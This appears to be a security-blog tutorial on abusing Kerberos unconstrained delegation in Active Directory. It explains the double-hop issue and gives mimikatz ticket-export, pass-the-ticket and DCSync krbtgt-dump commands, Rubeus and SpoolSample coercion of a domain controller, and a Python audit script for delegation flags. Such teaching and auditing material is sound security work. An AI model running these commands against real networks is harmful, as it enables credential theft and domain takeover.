
Unconstrained Delegation


Last updated 10 months ago

Double hop issue

Application and data access configurations often require fine-grained permissions, which can create design issues and security misconfigurations. One classic example of this lies in the Kerberos protocol and its authentication mechanism.

For example, consider an internal web server application that is only available to company employees. This web application uses Windows Authentication and retrieves data from a backend database. In this scenario, the web application should only be able to access data from the database server if the user accessing the web application has appropriate access according to Active Directory group membership.

Kerberos does not directly provide a way to accomplish this. When the web application uses Kerberos authentication, it is only presented with the user’s service ticket. This service ticket contains access permissions for the web application, but the web server service account can not use it to access the backend database.

This is known as the Kerberos double-hop issue. Microsoft’s Kerberos delegation solves this design issue and provides a way for the web server to authenticate to the backend database on behalf of the user.

Recap

When a user successfully logs in to a computer, a Ticket Granting Ticket (TGT) is returned. Once the user requests access to a service that uses Kerberos authentication, a Ticket Granting Service ticket (TGS) is generated by the Key Distribution Center (KDC) based on the TGT and returned to the user.

This TGS is then sent to the service, which validates the access. Note that this TGS only allows that specific user to access that specific service. Since the service cannot reuse the TGS to authenticate to a backend service, any Kerberos authentication stops here. Unconstrained delegation solves this with a forwardable TGT.

Kerberos problem again

We begin with an overview of Kerberos authentication.

In this case, when a user requests access to a service that uses unconstrained delegation, the request also includes a forwardable TGT.

Next, the forwardable TGT and its session key are embedded in the TGS (service ticket) that is sent to the server. Now the frontend service is able to impersonate us to the backend services.

Seems cool; this solves the double-hop problem.

SO WHY DOES THIS CAUSE PROBLEMS?

The frontend service stores all of these tickets in LSASS (Local Security Authority Subsystem Service), so it can impersonate the user to ANY service (this is unconstrained delegation; with constrained delegation it would only be able to access specific services).

If this frontend is compromised, an attacker is able to dump its memory to retrieve the hashes, impersonate the users and authenticate to any service.

Attack

Enumeration

We can enumerate with PowerView and search AD for computers whose userAccountControl attribute has the "TRUSTED_FOR_DELEGATION" flag set:

get-netcomputer -unconstrained

In this screenshot we found that the host web.cyberrange.com has the attribute TRUSTED_FOR_DELEGATION set.
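As an added example (not part of the original page), the same check performed offline in Python over constructed directory records, extended with the DC-versus-non-DC distinction and the NOT_DELEGATED mitigation check that the interview questions below ask about. The flag values are Microsoft's documented userAccountControl bits; the record shapes, account names and adminCount handling are assumptions.

```python
# userAccountControl bit values documented by Microsoft; all records below are constructed.
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer accounts
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (what the page hunts for)
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NORMAL_ACCOUNT = 0x200

# Against a live domain, PowerView's Get-NetComputer -Unconstrained boils down to the
# LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=524288), where the OID is the
# bitwise-AND matching rule and 524288 == 0x80000.

def find_unconstrained(computers: list[dict]) -> list[tuple[str, bool]]:
    """(name, is_domain_controller) for every computer account trusted for delegation."""
    return [(c["sAMAccountName"], bool(c["userAccountControl"] & SERVER_TRUST_ACCOUNT))
            for c in computers if c["userAccountControl"] & TRUSTED_FOR_DELEGATION]

def audit_computers(computers: list[dict]) -> list[str]:
    """DCs carry the flag by design; any other host with it is a finding to review."""
    return [name for name, is_dc in find_unconstrained(computers) if not is_dc]

def audit_privileged_users(users: list[dict]) -> list[str]:
    """Privileged users (adminCount=1) whose TGT can still be forwarded to such a host,
    i.e. that lack NOT_DELEGATED. Protected Users membership is the other mitigation."""
    return [u["sAMAccountName"] for u in users
            if u.get("adminCount") == 1 and not u["userAccountControl"] & NOT_DELEGATED]

SAMPLE_COMPUTERS = [  # constructed, not real directory data
    {"sAMAccountName": "AD1$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "SQL1$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION},
]
SAMPLE_USERS = [  # constructed
    {"sAMAccountName": "admin", "adminCount": 1, "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "da.jane", "adminCount": 1, "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED},
    {"sAMAccountName": "bob", "adminCount": 0, "userAccountControl": NORMAL_ACCOUNT},
]

if __name__ == "__main__":
    print("unconstrained on non-DC:", audit_computers(SAMPLE_COMPUTERS))      # ['WEB$']
    print("privileged, delegatable:", audit_privileged_users(SAMPLE_USERS))  # ['admin']
```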

Dump for the tickets in memory

mimikatz# privilege::debug
mimikatz# sekurlsa::tickets /export

This dumps all the tickets out of memory. Pick one of the desired TGTs and inject it into memory using kerberos::ptt:

mimikatz # sekurlsa::tickets /export
...
Group 2 - Ticket Granting Ticket
[00000000]
 Start/End/MaxRenew: 4/13/2020 5:14:40 AM ; 4/13/2020 3:11:20 PM ; 4/20/2020 5:11:20 AM
 Service Name (02) : krbtgt ; PROD.CORP1.COM ; @ PROD.CORP1.COM
 Target Name (--) : @ PROD.CORP1.COM
 Client Name (01) : admin ; @ PROD.CORP1.COM
 Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
 Session Key : 0x00000012 - aes256_hmac
 517cd6b29bac62711b184487d095507c5231b9d921fa7ae8c52a475edf721474
 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
 * Saved to file [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi !
...
mimikatz # kerberos::ptt [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi
* File: '[0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi': OK

What if the domain controller didn't visit the web service?

It is normal that the domain controller won't visit the web service (why would it?).

We could trick a print server into automatically logging in against it, saving a TGT in the memory of the server. Then the attacker could perform a Pass the Ticket attack to impersonate the print server's computer account.

In order to receive the tickets once it is forced to authenticate to us, first set up a Rubeus monitor session listening for tickets. Since we are forcing the DC, we should indicate the machine name of the DC (AD1$ in this case).

Now we use SpoolSample to perform the forced authentication.

Now switch back to the Rubeus window; we should receive a ticket from AD1$ with the forwardable flag set.

Use the same approach as above: inject the ticket into memory with either Rubeus or mimikatz.

mimikatz # lsadump::dcsync /domain:cyberrange.com /user:cyberrange.com\krbtgt

and dump the krbtgt hash from the DC.

Video demo

Author

Ik0nw

Interview question

1) Explain the Kerberos double-hop issue and how unconstrained delegation solves it.

2) How do you configure unconstrained delegation in AD?

3) What are the security risks associated with unconstrained delegation?

4) If we are using PowerView, what command can you issue to find potential unconstrained delegation?

5) Why do domain controllers have the "TRUSTED_FOR_DELEGATION" attribute set?

6) Any mitigations?

To make a print server log in against any machine you can use

SpoolSample